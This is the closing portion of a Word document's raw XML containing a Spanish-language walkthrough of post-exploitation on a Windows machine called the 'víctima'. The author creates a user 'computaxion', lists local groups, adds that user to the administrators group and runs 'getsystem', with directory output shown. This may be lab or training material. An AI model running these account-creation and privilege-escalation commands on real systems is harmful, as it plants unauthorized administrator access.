          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@computaxion:~# net user computaxion /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="009D7D47" w:rsidP="0030065A">
      <w:r>
        <w:t>Luego</w:t>
      </w:r>
      <w:r w:rsidR="0030065A">
        <w:t xml:space="preserve"> vamos a ver los grupos que conforman dentro de la </w:t>
      </w:r>
      <w:r>
        <w:t>víctima</w:t>
      </w:r>
      <w:r w:rsidR="0030065A">
        <w:t xml:space="preserve">, esto nos ayuda a la hora de dar </w:t>
      </w:r>
      <w:r>
        <w:t>privilegios</w:t>
      </w:r>
      <w:r w:rsidR="0030065A">
        <w:t xml:space="preserve"> en que idioma </w:t>
      </w:r>
      <w:r>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidR="0030065A">
        <w:t xml:space="preserve"> el sistema operativo y si tiene grupos de administrador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads&gt;net localgroup</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="009D7D47" w:rsidP="0030065A">
      <w:r>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r w:rsidR="0030065A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sabiendo</w:t>
      </w:r>
      <w:r w:rsidR="0030065A">
        <w:t xml:space="preserve"> que tiene </w:t>
      </w:r>
      <w:r>
        <w:t>grupo</w:t>
      </w:r>
      <w:r w:rsidR="0030065A">
        <w:t xml:space="preserve"> de administradores vamos a integrar a nuestro usuario dentro del grupo de los admin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\Users\Administrador\Downloads&gt;net localgroup administradores computaxion /add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:r>
        <w:t>C:\&gt;getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:r>
        <w:t xml:space="preserve"> Directorio de C:\</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A"/>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>02/07/2019  10:39 p.m.    &lt;DIR&gt;          computaxion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">02/07/2019  02:31 a.m.    </w:t>
      </w:r>
      <w:r>
        <w:t>&lt;DIR&gt;          inetpub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:r>
        <w:t>03/07/2019  11:08 p.m.    &lt;DIR&gt;          Nueva carpeta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>22/08/2013  12:52 p.m.    &lt;DIR&gt;          PerfLogs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>02/07/2019  10:54 p.m.    &lt;DIR&gt;          Program Files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>02/07/2019  02:26 a.m.    &lt;DIR&gt;          Program Files (x86)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>02/07/2019  01:00 a.m.    &lt;DIR&gt;          Users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>02/07/2019  02:30 a.m.    &lt;DIR&gt;          Windows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">               0</w:t>
      </w:r>
      <w:r w:rsidRPr="009D7D47">
        <w:t xml:space="preserve"> archivos</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">              0 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">               8 dirs  48.700.579.840 bytes libres</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\&gt;cd users</w:t>
      </w:r>
      <w:r w:rsidRPr="0030065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0030065A" w:rsidRPr="0030065A" w:rsidRDefault="0030065A" w:rsidP="0030065A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B440E9" w:rsidRPr="0094382B" w:rsidRDefault="00B440E9" w:rsidP="0030065A"/>
    <w:sectPr w:rsidR="00B440E9" w:rsidRPr="009438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65A"/>
    <w:rsid w:val="001B0200"/>
    <w:rsid w:val="002A7657"/>
    <w:rsid w:val="0030065A"/>
    <w:rsid w:val="00571C8D"/>
    <w:rsid w:val="00595C48"/>
    <w:rsid w:val="0067240C"/>
    <w:rsid w:val="006E681E"/>
    <w:rsid w:val="008F14C0"/>
    <w:rsid w:val="0094382B"/>
    <w:rsid w:val="009D7D47"/>
    <w:rsid w:val="00AA0B14"/>
    <w:rsid w:val="00AE15F3"/>
    <w:rsid w:val="00B4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70445-6570-4C69-AEB2-E3B83660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F14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A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F14C0"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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4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2872</Words>
  <Characters>15796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2019-12-08T02:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-08T08:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>